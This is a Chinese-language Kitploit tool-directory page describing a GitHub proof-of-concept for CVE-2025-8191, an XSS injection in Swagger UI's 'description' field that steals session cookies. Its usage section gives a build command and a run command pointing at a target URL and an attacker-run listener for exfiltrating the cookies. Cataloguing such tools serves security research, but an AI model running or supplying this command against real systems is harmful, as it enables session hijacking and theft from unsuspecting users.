Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8191 — 包含针对 Swagger UI 中 CVE‑2025‑8191 的概念验证(PoC)漏洞利用代码的仓库,利用 XSS 注入窃取会话 cookie。 | Kitploit
工具/GitHubGitHub/bytereaper77/cve-2025-8191
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育Archived
GitHubbytereaper77/cve-2025-8191

CVE-2025-8191

包含针对 Swagger UI 中 CVE‑2025‑8191 的概念验证(PoC)漏洞利用代码的仓库,利用 XSS 注入窃取会话 cookie。

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8191 – Swagger UI XSS注入

描述 :

此仓库包含针对CVE‑2025‑8191的概念验证(PoC)漏洞利用代码,该漏洞存在于Swagger UI中。

该漏洞允许在“description”字段中进行跨站脚本(XSS)注入,导致在Swagger UI版本≤ 1.0.3下远程执行脚本。

参考文献 :

  • NVD条目: https://nvd.nist.gov/vuln/detail/CVE-2025-8191

使用方法 :

root@kitploit:~
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v 

将http://target.com替换为目标Swagger UI URL,将http://yourserver.com替换为用于数据外泄的HTTP监听器。

免责声明 :

此代码仅供教育和安全研究目的使用。请勿将其用于未经明确授权的系统。作者对任何滥用行为概不负责。

许可证 :

MIT License

下载工具